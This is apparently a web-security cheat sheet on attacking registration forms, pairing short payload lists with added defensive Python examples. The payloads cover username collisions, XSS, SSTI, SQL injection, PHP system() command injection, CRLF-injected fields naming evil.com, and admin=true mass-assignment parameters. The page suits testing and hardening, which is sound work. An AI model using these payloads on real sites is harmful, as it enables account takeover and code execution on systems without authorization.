Web Registration (Signup) Attack
Last modified: 2024-02-08
A web application's registration (signup) mechanism might be vulnerable to compromise.
Register with the Same Username/Email Address as Existing User
We might be able to register the same username/email address as an existing user. This may affect the web server, so be careful when testing.
Here are examples of usernames to register.
admin
administrator
root
Alternatively, it's worth trying various approaches to registration.
# Insert null byte
admin\0
admin%00
# Insert a space before username
admin
%20admin
# Insert a space after username
admin
admin%20
# Insert spaces around username
admin
%20admin%20
# Replace uppercase/lowercase
Admin
aDmIn
# Overflow (we need to find the maximum length that can be registered)
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxadmin
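Every variant in the list above works against the same weakness: the uniqueness check compares the raw submitted string, while the stored or displayed name is produced after some later transformation (NUL/whitespace stripping, case folding, column truncation). The defensive fix is to canonicalize first and compare the canonical form. The following is an added example (not code from the original page) of such a canonicalization step; the regex, the 32-character limit and the sample account set are assumptions. The control-character check also covers the CRLF sequence discussed further down this page.

```python
import re
import unicodedata
from urllib.parse import unquote

# Assumed policy: 3-32 characters from a small ASCII set. A real application
# chooses its own pattern; the point is a strict allowlist plus a length cap.
USERNAME_RE = re.compile(r"[a-z0-9._-]{3,32}")


class InvalidUsername(ValueError):
    pass


def canonicalize_username(raw: str) -> str:
    """Reduce a submitted username to the form that is stored and compared."""
    # The web framework normally URL-decodes form fields before the handler
    # runs; decoding here lets the constructed samples below use %xx form.
    value = unquote(raw)
    # Reject control characters (NUL, CR, LF, ...) instead of silently
    # dropping them: a stripped NUL is exactly how "admin\0" collides with "admin".
    if any(unicodedata.category(ch) == "Cc" for ch in value):
        raise InvalidUsername("control character in username")
    # NFKC folds full-width and compatibility forms; casefold() handles more
    # than lower(); strip() removes surrounding spaces.
    value = unicodedata.normalize("NFKC", value).strip().casefold()
    # Length and character allowlist applied after normalization, so a
    # 53-character "xxxx...admin" cannot rely on the database truncating it.
    if not USERNAME_RE.fullmatch(value):
        raise InvalidUsername("username does not match the allowed pattern")
    return value


def try_register(existing: set[str], raw: str) -> tuple[bool, str]:
    """Return (accepted, detail). On success the canonical name is stored."""
    try:
        name = canonicalize_username(raw)
    except InvalidUsername as exc:
        return False, f"rejected: {exc}"
    if name in existing:
        return False, f"rejected: '{name}' already taken"
    existing.add(name)
    return True, name


if __name__ == "__main__":
    # Constructed sample: one existing account plus the variants listed above.
    taken = {"admin"}
    for candidate in ["admin\x00", "admin%00", "%20admin", "admin%20", "%20admin%20",
                      "Admin", "aDmIn", "x" * 48 + "admin", "john"]:
        print(repr(candidate), "->", try_register(taken, candidate))
```

The order matters: decode, reject control characters, normalize, then validate length and charset, and only then consult the user table. Applying the length check before `strip()` or the uniqueness check before `casefold()` reintroduces the collisions the list above exploits.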
Register Malicious Username/Email Address
XSS
We might be able to inject XSS payloads into the username at registration.
john<script>alert(1)</script>
john</span><script>alert(1)</script>
john<iframe src=https://evil.com></iframe>
# Combine with overflow character length
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx<script>alert(1)</script>
SSTI
It's worth trying SSTI payloads if the website uses frameworks/template engines such as Flask, Pug, Angular, etc. Register a username with the following SSTI payloads.
{{2*3}}
{2*3}
${2*3}
2*3
{{ `<script>alert(1)</script>` }}
{% debug %}
SQLi
If the website queries the database using the username, we might be able to inject SQL commands through it. Register a username with the following SQLi payloads.
test' or 1=1--
test' or '1'='1'--
test' union select null,null--
test' union select null,null,null--
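The payloads above only work when the username is spliced into the SQL text. The added example below (not the page's code) shows a registration-time "is this username taken?" lookup in both forms against an in-memory SQLite table with constructed rows: the concatenating version answers "taken" for `test' or 1=1--` although no such user exists, and returns a fabricated row for the two-column union, while the parameterized version treats the same strings as literal usernames. Table layout and sample rows are assumptions.

```python
import sqlite3

# Constructed sample accounts.
SAMPLE_USERS = [("admin", "admin@example.test"), ("alice", "alice@example.test")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def username_exists_vulnerable(conn: sqlite3.Connection, username: str) -> bool:
    """The defective pattern: the submitted value becomes part of the SQL text."""
    sql = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchone() is not None


def username_exists_safe(conn: sqlite3.Connection, username: str) -> bool:
    """Bound parameter: the driver passes the value separately from the query."""
    row = conn.execute(
        "SELECT username, email FROM users WHERE username = ?", (username,)
    ).fetchone()
    return row is not None


def compare(conn: sqlite3.Connection, candidates: list[str]) -> dict[str, tuple]:
    """Run both lookups over each candidate; errors from the vulnerable form are recorded."""
    results = {}
    for name in candidates:
        try:
            vuln = username_exists_vulnerable(conn, name)
        except sqlite3.Error as exc:
            vuln = f"error: {exc.__class__.__name__}"   # e.g. column-count mismatch
        results[name] = (vuln, username_exists_safe(conn, name))
    return results


if __name__ == "__main__":
    db = make_db()
    for name, (vuln, safe) in compare(db, [
        "admin", "bob", "test' or 1=1--", "test' union select null,null--",
        "test' union select null,null,null--",
    ]).items():
        print(f"{name!r:45} concatenated={vuln!s:25} parameterized={safe}")
```

A practical detection angle: the vulnerable lookup produces database errors (the three-column union) that a parameterized query never raises, so a spike in SQL syntax errors on the registration endpoint is a useful alert even before any payload succeeds.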
PHP Injection
john<?php echo system('id');?>
john<?php system('ping -c 1 10.0.0.1');?>
CRLF (%0d%0a)
Inserting a CRLF sequence (%0d%0a) after the username or email may cause unexpected behavior.
username=john%0d%0a&password=mypassword123
email=attacker%40evil.com%0d%0a&password=mypassword123
Broken Access Control
We might be able to bypass access restrictions on the target page by adding specific parameters at registration.
username=test&password=test&admin=true
username=test&password=test&isAdmin=true
username=test&password=test&admin=1
username=test&password=test&usertype=1
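These extra parameters succeed when the handler copies every submitted field onto the new account record (mass assignment) and a later authorization check reads a field such as `admin` or `isAdmin` from that record. The added example below (not the page's code) parses the request bodies listed above and contrasts the copying pattern with an allowlist that reads only the named fields and sets the role server-side; the field names, the PBKDF2 parameters and the role value are assumptions. The `unexpected_fields` helper is the detection half: unknown registration fields are worth logging.

```python
import hashlib
import os
from urllib.parse import parse_qs

# Assumed registration schema: the only fields a client may set.
ALLOWED_FIELDS = {"username", "password"}


def parse_form(body: str) -> dict[str, str]:
    """Decode an application/x-www-form-urlencoded body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def unexpected_fields(body: str) -> set[str]:
    """Submitted fields outside the schema; a tampering signal worth logging."""
    return set(parse_form(body)) - ALLOWED_FIELDS


def hash_password(password: str) -> str:
    # PBKDF2-SHA256 with a random salt (assumed parameters, not the page's code).
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return f"pbkdf2_sha256${salt.hex()}${digest.hex()}"


def build_user_vulnerable(body: str) -> dict:
    """Mass-assignment pattern: every submitted field lands on the record."""
    form = parse_form(body)
    user = {"role": "user", **form}          # admin=true / isAdmin=true survive here
    user["password_hash"] = hash_password(user.pop("password"))
    return user


def build_user_safe(body: str) -> dict:
    """Allowlist pattern: read named fields only; privileges are never client-supplied."""
    form = parse_form(body)
    missing = ALLOWED_FIELDS - set(form)
    if missing:
        raise ValueError(f"missing fields: {sorted(missing)}")
    return {
        "username": form["username"],
        "password_hash": hash_password(form["password"]),
        "role": "user",                      # set server-side, regardless of input
    }


if __name__ == "__main__":
    # Constructed request bodies, matching the list above.
    for body in ["username=test&password=test&admin=true",
                 "username=test&password=test&isAdmin=true",
                 "username=test&password=test&usertype=1"]:
        print(body)
        print("  unexpected:", unexpected_fields(body))
        print("  vulnerable record keys:", sorted(build_user_vulnerable(body)))
        print("  safe record keys:      ", sorted(build_user_safe(body)))
```

The same allowlist discipline applies to JSON bodies and to ORM helpers that accept a whole request object; the record should be constructed from named fields, not from the request.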